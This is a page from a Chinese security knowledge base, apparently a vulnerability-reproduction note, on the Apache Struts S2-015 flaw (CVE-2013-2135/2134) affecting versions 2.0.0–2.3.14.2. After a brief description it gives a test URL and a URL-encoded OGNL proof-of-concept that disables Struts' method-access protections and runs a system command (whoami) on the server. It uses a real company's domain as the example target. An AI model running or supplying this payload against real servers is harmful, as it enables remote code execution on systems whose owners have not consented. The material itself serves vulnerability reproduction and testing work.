menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 160-Apache Struts chevron_right 012-(CVE-2013-2135)(CVE-2013-2134)s2-015.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    012-(CVE-2013-2135)(CVE-2013-2134)s2-015.md
    904 B / 2021-07-17 00:01:26
        # (CVE-2013-2135)(CVE-2013-2134)s2-015

## 一、漏洞简介

基于通配符定义的动作映射,如果一个请求跟任何其他定义的操作不匹配,他将会匹配*,并且请求的同操作名称的jsp文件

## 二、漏洞影响

2.0.0 - 2.3.14.2

## 三、复现过程

```bash
http://baidu.com:8080/example/HelloWorld.action

```

==>改成

```
http://baidu.com:8080/example/%25%7B1%2B1%7D.action

```

![图片.png](images/e6fa8aedb29b4386b3ff928b8e2db517.png)

### poc

```
%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D.action

```
    links
    file_download